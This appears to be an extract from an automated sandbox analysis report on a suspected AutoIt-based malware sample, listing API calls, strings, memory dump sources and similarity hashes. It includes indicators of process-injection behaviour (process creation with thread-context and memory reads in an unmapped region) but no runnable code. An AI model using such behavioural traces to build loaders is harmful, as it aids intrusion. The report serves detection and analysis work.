                                                                                              • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                              • API String ID: 4212290369-3242690629
                                                                                              • Opcode ID: 67a63bbdec51c0968b32f950600edf130289faa60b61e7ebe0176d65307671af
                                                                                              • Instruction ID: 2c0c70366dbbe872e6a0da302420d9dea859dee1ae5dba1f3a338dd93c9efd3e
                                                                                              • Opcode Fuzzy Hash: 67a63bbdec51c0968b32f950600edf130289faa60b61e7ebe0176d65307671af
                                                                                              • Instruction Fuzzy Hash: 24B2C370A08741DFD724DF24C994FAAB7F5BF84305F14492DE94A972A2CB71E889CB42

Control-flow Graph

APIs
  • Part of subcall function 00A78F5F: __time64.LIBCMT ref: 00A78F69
  • Part of subcall function 00A14EE5: _fseek.LIBCMT ref: 00A14EFD
• __wsplitpath.LIBCMT ref: 00A79234
  • Part of subcall function 00A340FB: __wsplitpath_helper.LIBCMT ref: 00A3413B
• _wcscpy.LIBCMT ref: 00A79247
• _wcscat.LIBCMT ref: 00A7925A
• __wsplitpath.LIBCMT ref: 00A7927F
• _wcscat.LIBCMT ref: 00A79295
• _wcscat.LIBCMT ref: 00A792A8
  • Part of subcall function 00A78FA5: _memmove.LIBCMT ref: 00A78FDE
  • Part of subcall function 00A78FA5: _memmove.LIBCMT ref: 00A78FED
• _wcscmp.LIBCMT ref: 00A791EF
  • Part of subcall function 00A79734: _wcscmp.LIBCMT ref: 00A79824
  • Part of subcall function 00A79734: _wcscmp.LIBCMT ref: 00A79837
• DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00A79452
• _wcsncpy.LIBCMT ref: 00A794C5
• DeleteFileW.KERNEL32(?,?), ref: 00A794FB
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A79511
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A79522
• DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A79534
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
• String ID:
• API String ID: 1500180987-0
• Opcode ID: 690f717a224ef3279a3a48c84b7e490148b542eb74e33a99892cfa5d4b05b2d8
• Instruction ID: 79b0142b0619e722d3328dda0187cb28abbf42d7a5b13deaca2e3fd524568954
• Opcode Fuzzy Hash: 690f717a224ef3279a3a48c84b7e490148b542eb74e33a99892cfa5d4b05b2d8
• Instruction Fuzzy Hash: 85C11DB1E00119AADF11DF95CD85ADFBBBDEF49310F0080AAF609E7151DB309A858F65

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00A13074
• RegisterClassExW.USER32(00000030), ref: 00A1309E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A130AF
• InitCommonControlsEx.COMCTL32(?), ref: 00A130CC
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A130DC
• LoadIconW.USER32(000000A9), ref: 00A130F2
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A13101
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 6c634365e0e0aa4dd2be666a0b1b7d976ec6de40cca796cc93838da8047286fa
• Instruction ID: db0f09f5d7b34922387bc026e5f0a9bfe00449f4921bd75918df048a97ea592d
• Opcode Fuzzy Hash: 6c634365e0e0aa4dd2be666a0b1b7d976ec6de40cca796cc93838da8047286fa
• Instruction Fuzzy Hash: 9631E2B1941249AFDB10CFE4E889ADDBBF4FB09310F14452FE581E62A0E7B50586DF51

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00A13074
• RegisterClassExW.USER32(00000030), ref: 00A1309E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A130AF
• InitCommonControlsEx.COMCTL32(?), ref: 00A130CC
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A130DC
• LoadIconW.USER32(000000A9), ref: 00A130F2
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A13101
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: d3827e859e692b3d8b4bd43ff7036839c9363679b05a72e840e74c0340b91f23
• Instruction ID: 41ffde6368847b10818c59de2353a23765a4ee7481e4221dd2529340b7b80e24
• Opcode Fuzzy Hash: d3827e859e692b3d8b4bd43ff7036839c9363679b05a72e840e74c0340b91f23
• Instruction Fuzzy Hash: C321B4B1E01618AFDB00DFE4E889ADDBBF8FB08701F10412BF911E62A0DBB145559F91

Control-flow Graph

APIs
  • Part of subcall function 00A14706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00AD52F8,?,00A137AE,?), ref: 00A14724
  • Part of subcall function 00A3050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00A17165), ref: 00A3052D
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A171A8
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A4E8C8
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00A4E909
• RegCloseKey.ADVAPI32(?), ref: 00A4E947
• _wcscat.LIBCMT ref: 00A4E9A0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 2673923337-2727554177
• Opcode ID: c59e3967af6231ea63b2cfe0909cd5f64b8d604e6c7cf3650b64368ced0b7cba
• Instruction ID: f73baab91a6483718dc2f1dc1a0d6c3d034abce1b5db1b507e5057701be50da4
• Opcode Fuzzy Hash: c59e3967af6231ea63b2cfe0909cd5f64b8d604e6c7cf3650b64368ced0b7cba
• Instruction Fuzzy Hash: 89714C719093019EC704EFA5E9819EBBBF8FF85350F40092FF446871A1EB719949CB92

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00A13A50
• LoadCursorW.USER32(00000000,00007F00), ref: 00A13A5F
• LoadIconW.USER32(00000063), ref: 00A13A76
• LoadIconW.USER32(000000A4), ref: 00A13A88
• LoadIconW.USER32(000000A2), ref: 00A13A9A
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A13AC0
• RegisterClassExW.USER32(?), ref: 00A13B16
  • Part of subcall function 00A13041: GetSysColorBrush.USER32(0000000F), ref: 00A13074
  • Part of subcall function 00A13041: RegisterClassExW.USER32(00000030), ref: 00A1309E
  • Part of subcall function 00A13041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A130AF
  • Part of subcall function 00A13041: InitCommonControlsEx.COMCTL32(?), ref: 00A130CC
  • Part of subcall function 00A13041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A130DC
  • Part of subcall function 00A13041: LoadIconW.USER32(000000A9), ref: 00A130F2
  • Part of subcall function 00A13041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A13101
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: 96db6f1024914b44a9147414d83de271e485cb0836ca45b71c0a3f7b4662cdfa
• Instruction ID: 989300c30815616a0b0ff5af356387daa5d13cfc91507d69c8894820ad69f240
• Opcode Fuzzy Hash: 96db6f1024914b44a9147414d83de271e485cb0836ca45b71c0a3f7b4662cdfa
• Instruction Fuzzy Hash: 6F2128B1E02304AFEB10DFF4EC09BED7BB0EB08712F10012AE505A62A1D7B556568F84

Control-flow Graph

APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 00A136D2
• KillTimer.USER32(?,00000001), ref: 00A136FC
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A1371F
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A1372A
• CreatePopupMenu.USER32 ref: 00A1373E
• PostQuitMessage.USER32(00000000), ref: 00A1374D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated
• API String ID: 129472671-2362178303
• Opcode ID: df62bd1614c2441c895684f83eb1dddaca602277071e135e33a4f1181d1e1d8d
• Instruction ID: 5e0fd72db7d481167312f650eeafc7d681e6794c22d5dbd0cf9849a03c79939f
• Opcode Fuzzy Hash: df62bd1614c2441c895684f83eb1dddaca602277071e135e33a4f1181d1e1d8d
• Instruction Fuzzy Hash: F24107B7604545BBDF24DFB8ED09BFE37A4EB44301F140126F603D62E1EA609E86A761

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
• String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
• API String ID: 1825951767-3513169116
• Opcode ID: 4186158c796fdced7afa4e5a8bb392debf423c353bbd1c8868c9439f8fcd05d0
• Instruction ID: 15a998037f4010e637aae58e3e1544f650e68182f51dee6592d1567d7b3eeb5c
• Opcode Fuzzy Hash: 4186158c796fdced7afa4e5a8bb392debf423c353bbd1c8868c9439f8fcd05d0
• Instruction Fuzzy Hash: A1A14B76D0021DAACF04EFE4DD91AEEBBB8BF14350F44042AF416A7191EF745A89CB60

                                                                                              Control-flow Graph (graph image not reproduced in this extract; legend: Executed / Not Executed; entry block 1da25e0-1da268e)
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01DA26B1
                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01DA28D7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694788619.0000000001DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01DA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1da0000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFileFreeVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 204039940-0
                                                                                              • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                              • Instruction ID: 2cc46aa6bbada852f0c4f1d0acca541bc4ad1a050e33d65c66a3b10321828d6f
                                                                                              • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                              • Instruction Fuzzy Hash: 5DA10774E00209EBDF14CFA5C994BAEBBB5FF48304F608159E501BB280D7799A81CFA4

                                                                                              Control-flow Graph (graph image not reproduced in this extract; legend: Executed / Not Executed; single block a139d5-a13a45)
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A13A03
                                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A13A24
                                                                                              • ShowWindow.USER32(00000000,?,?), ref: 00A13A38
                                                                                              • ShowWindow.USER32(00000000,?,?), ref: 00A13A41
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CreateShow
                                                                                              • String ID: AutoIt v3$edit
                                                                                              • API String ID: 1584632944-3779509399
                                                                                              • Opcode ID: cecee0523fbd2cca4c3ce74ed5395aba3606276c2ad7a0995fd39c0adb17271c
                                                                                              • Instruction ID: cb384e569d2e2501d4ff81ae1102abae429e530af1bca027848d31e3f12ce3b3
                                                                                              • Opcode Fuzzy Hash: cecee0523fbd2cca4c3ce74ed5395aba3606276c2ad7a0995fd39c0adb17271c
                                                                                              • Instruction Fuzzy Hash: 83F03A70A022907EEA3097A36C48EAB3F7DE7C6F50B00002BB901E2170C6614806CAB0

                                                                                              Control-flow Graph (graph image not reproduced in this extract; legend: Executed / Not Executed; entry block 1da23b0-1da24d8)
                                                                                              APIs
                                                                                                • Part of subcall function 01DA22A0: Sleep.KERNELBASE(000001F4), ref: 01DA22B1
                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01DA24CE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694788619.0000000001DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01DA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1da0000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFileSleep
                                                                                              • String ID: ZJX0NH3Q9U3PICZ44ILODR
                                                                                              • API String ID: 2694422964-2233071432
                                                                                              • Opcode ID: 4019f6afc43fe06ae23ae6e5b73a38cb9a203682bad7fb1804503037f5e73d7c
                                                                                              • Instruction ID: ae93d25697bcd4de363ae06caea9c0605c51b3588a82a51fb43a1194a0f147a0
                                                                                              • Opcode Fuzzy Hash: 4019f6afc43fe06ae23ae6e5b73a38cb9a203682bad7fb1804503037f5e73d7c
                                                                                              • Instruction Fuzzy Hash: E451C570D04289EAEF11DBE4C854BEFBBB8AF19300F404199E6497B2C1D7B95B44CBA5

                                                                                              Control-flow Graph (graph image not reproduced in this extract; legend: Executed / Not Executed; entry block a1407c-a14092)
                                                                                              APIs
                                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00A4D3D7
                                                                                                • Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06
                                                                                              • _memset.LIBCMT ref: 00A140FC
                                                                                              • _wcscpy.LIBCMT ref: 00A14150
                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A14160
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                              • String ID: Line:
                                                                                              • API String ID: 3942752672-1585850449
                                                                                              • Opcode ID: 4e771085f8dde2b037ef5e38eaef680a6da844e028a022331d39ce29f60f3b8f
                                                                                              • Instruction ID: 623f3db40a6230f042a308ac85e50aaac738f5630665961cac25b55d76620897
                                                                                              • Opcode Fuzzy Hash: 4e771085f8dde2b037ef5e38eaef680a6da844e028a022331d39ce29f60f3b8f
                                                                                              • Instruction Fuzzy Hash: 3931AF71409704AFD321EBA4DD46FDF77E8AF48310F10491BF586920A1EB74A689CB92

                                                                                              Control-flow Graph (graph image not reproduced in this extract; legend: Executed / Not Executed; entry block a3541d-a35436)
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 1559183368-0
                                                                                              • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                              • Instruction ID: 2257151759b53c8ce68a12d5ba3591060184354b31dd55c60a7d19a8292f0d8a
                                                                                              • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                              • Instruction Fuzzy Hash: B451A270E00B05DBDB288FBDD98166EB7B7AF41321F248729F825962D0D771ED909B40
                                                                                              APIs
                                                                                                • Part of subcall function 00A14DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00AD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A14E0F
                                                                                              • _free.LIBCMT ref: 00A4E263
                                                                                              • _free.LIBCMT ref: 00A4E2AA
                                                                                                • Part of subcall function 00A16A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A16BAD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                              • API String ID: 2861923089-1757145024
                                                                                              • Opcode ID: ba6aa0cf9ff2c15a59f52dbb40530682c33e9aa6ad9ccb9d429d4f90da166dd3
                                                                                              • Instruction ID: d982926d2dfeef3a269722650dba1d0e7ca7c44c6f2575a3045302abf9488c70
                                                                                              • Opcode Fuzzy Hash: ba6aa0cf9ff2c15a59f52dbb40530682c33e9aa6ad9ccb9d429d4f90da166dd3
                                                                                              • Instruction Fuzzy Hash: 8B918D75A00219EFCF04EFA4DD919EDB7B8FF58310F14852AF816AB2A1DB70A945CB50
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00A135A1,SwapMouseButtons,00000004,?), ref: 00A135D4
                                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00A135A1,SwapMouseButtons,00000004,?,?,?,?,00A12754), ref: 00A135F5
                                                                                              • RegCloseKey.KERNELBASE(00000000,?,?,00A135A1,SwapMouseButtons,00000004,?,?,?,?,00A12754), ref: 00A13617
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: Control Panel\Mouse
                                                                                              • API String ID: 3677997916-824357125
                                                                                              • Opcode ID: d69b477eac98b26963b1d5d65b7beebf252f91fedf23efd5700d9a1edeb57cea
                                                                                              • Instruction ID: 35eb89f472438c99f2c22e519120358cddf28210af1b0ad43578865ad380d720
                                                                                              • Opcode Fuzzy Hash: d69b477eac98b26963b1d5d65b7beebf252f91fedf23efd5700d9a1edeb57cea
                                                                                              • Instruction Fuzzy Hash: 33114872610208BFDF20CFA4DC809EFB7BCEF44740F00846AE805D7210E6719E959760
                                                                                              APIs
                                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01DA1ACD
                                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01DA1AF1
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01DA1B13
                                                                                              • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 01DA1E1C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694788619.0000000001DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01DA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1da0000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 572931308-0
                                                                                              • Opcode ID: 5c0c2c366f6ee379bfa73ed3ee6324b9c12a1226fce66c24c6c78c8833906ccb
                                                                                              • Instruction ID: e2248e05b0545ec68713e66c7833255ba4e58d42fd12bf2ae3da7c4b5349ba8a
                                                                                              • Opcode Fuzzy Hash: 5c0c2c366f6ee379bfa73ed3ee6324b9c12a1226fce66c24c6c78c8833906ccb
                                                                                              • Instruction Fuzzy Hash: 14620B30A14258DBEB24DFA4C850BDEB772EF58300F5091A9D20DEB3A4E7759E81CB59
                                                                                              APIs
                                                                                                • Part of subcall function 00A14EE5: _fseek.LIBCMT ref: 00A14EFD
                                                                                                • Part of subcall function 00A79734: _wcscmp.LIBCMT ref: 00A79824
                                                                                                • Part of subcall function 00A79734: _wcscmp.LIBCMT ref: 00A79837
                                                                                              • _free.LIBCMT ref: 00A796A2
                                                                                              • _free.LIBCMT ref: 00A796A9
                                                                                              • _free.LIBCMT ref: 00A79714
                                                                                                • Part of subcall function 00A32D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00A39A24), ref: 00A32D69
                                                                                                • Part of subcall function 00A32D55: GetLastError.KERNEL32(00000000,?,00A39A24), ref: 00A32D7B
                                                                                              • _free.LIBCMT ref: 00A7971C
